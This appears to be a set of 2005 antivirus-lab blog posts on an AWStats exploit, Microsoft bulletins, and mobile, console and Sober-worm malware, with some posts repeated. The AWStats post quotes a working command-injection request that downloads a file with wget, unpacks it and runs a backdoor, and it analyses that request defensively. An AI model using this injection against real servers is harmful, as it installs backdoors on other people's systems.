We have received a packet which contains an exploit for theawstat vulnerability.

The exploit is pretty straight forward.

GET /awstats/awstats.pl?configdir=|echo%{blocked};cd%20/tmp;wget%{blocked}ice;
tar%20zxvf%20ice;rm%20-rf%20ice;cd%20.x;./httpd;a;echo%20;echo| HTTP/1.1

As highlighted above, it is pretty clear that the vulnerability in the packet was meant to download a file named ice using wget.

The file ice is actually a gzipped file. This is just another compression tool like winzip and winrar. Gzipped files are more popular on unix users.

Upon downloading, the contents of the file “ice”, is extracted using “tar”(a command in linux to decompress gzipped files) to a “.x” directory, in linux a directory with “.” is a hidden directory.

Among the files that are extracted are httpd(executed upon extraction) and pico. Both files are already detected as ELF_RST.B since january 2002. ELF_RST.B is a backdoor virus, you can read more about it in its malware report.

Note: The filename pico is also the name of a very basic text editor in Linux.

Microsoft has released 9 Microsoft Vulnerabilities this week. Three of which are critical, four are ranked as important and 2 as moderate.

Critical

• MS05-050 Vulnerability in DirectShow Could Allow Remote Code Execution (904706)
  
• MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400)
  
• MS05-052 Cumulative Security Update for Internet Explorer (896688)

Important

• MS05-046 Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (899589)
  
• MS05-047 Vulnerability in Plug and Play Could Allow Remote Code Execution and Local Elevation of Privilege (905749)
  
• MS05-048 Vulnerability in the Microsoft Collaboration Data Objects Could Allow Remote Code Execution (907245)
  
• MS05-049 Vulnerabilities in Windows Shell Could Allow Remote Code Execution (900725)

Moderate

• MS05-044 Vulnerability in the Windows FTP Client Could Allow File Transfer Location and Tampering (905495)
  
• MS05-045 Vulnerability in Network Connection Manager Could Allow Denial of Service (905414)

Read more about the vulnerabilities here.

There is a new Symbian malware that has been
found to be a trojanized version of a Symbian application called
InstantSis.


InstantSis is created by Biscompute and has the capability of
transferring software from mobile phone to another mobile phone or
to a PC.


This Symbian trojan is the first of its kind because it
particularly targets the phone’s MMC card. It sets a randomly
generated password to the card thus making the card inaccessible
once the phone has been rebooted not unless the correct password
has been provided. It also deletes system directories thus losing
user data (installed applications, MMS and SMS messages, phone
numbers, etc) and other critical system data.


It has greater damaging effect on phones that uses Symbian OS 8.1as
because they cannot recover deleted system directories on reboot as
compared to Symbian OS 7.0s and earlier.


We are still acquiring for the sample of this new Symbian
malware.



Just an update:


The virus report for SYMBOS_CARDBLK.A has already been posted. You
may view the details at the following URL:


For technical details click here

We found an interesting bagle-related site
that installs a Trojan, detected as TROJ_AGENT.ABT, which downloads and executeBKDR_VIPGSM.C. BKDR_VIPGSM interests us since
it is speculated to be related to the Bagle and only one group made
these malwares. Furthermore, BKDR_VIPGSM.C drops and executes a
file detected as WORM_BAGLE.GEN. (hmmm interesting)


However, upon further investigation, the file detected as
WORM_BAGLE.GEN does not replicate itself. It only had codes similar
to the Bagle worm but does not have a mass mailing routine and is
now detected as as TROJ_HARBAG.B.


There was also an interesting discussion in the KAV
blog that discussed about the possible relations of this
malware to the Bagle worm. Thus, the malwares mentioned above can
be another proof that the speculation can possibly be true.

Just recently, we have seen the possiblity
of infecting the Sony Playstation Portable.

Now, malwares has extended again its infection vector, the Nintendo
DS.

The said trojan disguises as a roamloader by the name of
r0mloader.zip. But, when used it attempts to remove critical parts
of the DSes firmware. Some said that it is also capable of
infecting the GBAMP firmware and SuperCard firmware. This only
proves that DS is also vulnerable to such hacks.

This new trojan was said to be created by the name of DarkFader and
the first copy of this trojan has the name taihen.zip that has been
noted to have hentai images rom. No wonder why it spreads so
fast!

Update (Jovs, 12 October 2005 01:47:29)

Malware are not for computers alone. Some have evolved to infecting
even mobile devices and not to mention some mp3 players too. And
now…. they have found another target and you may be one of them,
the videogame-enthusiasts. The first trojan for Sony Playstation
Portable, otherwise known as PSP (now you know!?) has now been
found. Originally PSP can only run games which are approved by Sony
but of course almost if not all is possible in the computing world
— hacks are available which allow users to run their own games.
Actually, a vulnerability that allows execution of custom code was
found in the older versions (like 1.50) of PSP and Sony had already
fixed this issue in the newer versions. Exploit has also been available and been used by this
newly found trojan, which disguises as some tool to get on board
for some other games. Instead, it deletes system files, rendering
the machine to be inoperable. So now there it is… your
“game-buddy”….lying “dead”.


Each day, malware authors have thought of widening the horizons for
infection, the question now lies… what could be next?


Here is the code as seen in some forum:

_start:

sceIoAssign:

sceIoRemove:

main:



Meanwhile, sample is now being processed by the Service Team. Heads
up for updates.


For more information, you may visit this site.

In the new WORM_SOBER.AC, now on yellow alert, a simple yet powerful Anti Virus Retaliation is included. What”s more is that its only target is… guess who?? MICROSOFT!!

Microsoft’s new feature, the Microsoft Windows Malicious Software Removal Tool, is currently being targeted by the new Sober variant.

What it does is, it searches the list of running process for MRT.EXE (process name for Microsoft Windows Malicious Software Removal Tool), kills MRT.EXE and then displays this message box:



The message box above doubled with the detection of Microsoft Windows Malicious Software Removal Tool may make an inexperienced user feel safe and relaxed, making him think that he is not infected.

We are able to obtain samples of a new variant or the Sober worm through our handy dandy email honeypot system at approximately 8am this morning. Staying true to its Sober-like characteristics, this worm spreads via email and uses its own SMTP engine.

As of the moment, we have an incident count of 300 emails intercepted by the honeypot, and counting.

For further details, refer to the virus report which is now available for your viewing pleasure.

We have received and still are receiving samples of repacked versions of WORM_SOBER.AC. Yes, you read it right, versionS. This means that there are more samples flooding in with basically the same charateristics, yet with various MD5 hashes.

The email details of these repacked versions are different from the previous one. All of the samples from the new wave of WORM_SOBER.AC are packed using the same packer–FSG. These samples have added garbage codes. These garbge codes vary from sample to sample. Samples with the same garbage codes all have the same MD5. The difference in garbage code accounts for the difference in MD5. This is contrary to the initial loads of previous WORM_SOBER.AC samples which are UPX-packed, all with a constant MD5 value.

In case there’s any confusion here is an explanation on the “REPACKED” version of this worm

For the purpose of discussion, lets call the WORM_SOBER.AC packed with UPX as WORM_SOBER_UPX and the so called repacked version as WORM_SOBER_FSG since its packed with FSG.

When I executed WORM_SOBER_FSG it dropped and executed a copy of WORM_SOBER_UPX. Which means WORM_SOBER_FSG is just a trojan dropper for WORM_SOBER_UPX.

Hope that clears things out…

We are now receiving a new version of WORM_SOBER.AC. Insted of FSG it is now packed with MEW.

So we now have

• WORM_SOBER.AC (upx packed) – Actual WORM that spreads.
  
• WORM_SOBER.AC (FSG packed) – Dropper for WORM_SOBER.AC(UPX PACKED)
  
• WORM_SOBER.AC (MEW packed) – Dropper for WORM_SOBER.AC(UPX PACKED)

Malware are not for computers alone. Some have evolved to infecting even mobile devices and not to mention some mp3 players too. And now…. they have found another target and you may be one of them, the videogame-enthusiasts. The first trojan for Sony Playstation Portable, otherwise known as PSP has now been found. Originally PSP can only run games which are approved by Sony but of course almost if not all is possible in the computing world — hacks are available which allow users to run their own games. The trojan disguises as some hacking tool to get on board for some other games. Instead, it deletes system files, rendering the machine to be inoperable. Affected systems are those PSPs which had older firmware versions such as 1.50. Each day, malware authors have thought of widening the horizons for infection, the question now lies… what could be next?

Here is the code as seen in some forum:

_start:

sceIoAssign:

sceIoRemove:

main:



Meanwhile, we are currently acquiring sample so heads up for updates.

For more information, you may visit this site.

We are able to obtain samples of a new variant or the Sober worm through our handy dandy email honeypot system at approximately 8am this morning. Staying true to its Sober-like characteristics, this worm spreads via email and uses its own SMTP engine.

As of the moment, we have an incident count of 300 emails intercepted by the honeypot, and counting.
For further details, refer to the virus report which is now available for your viewing pleasure.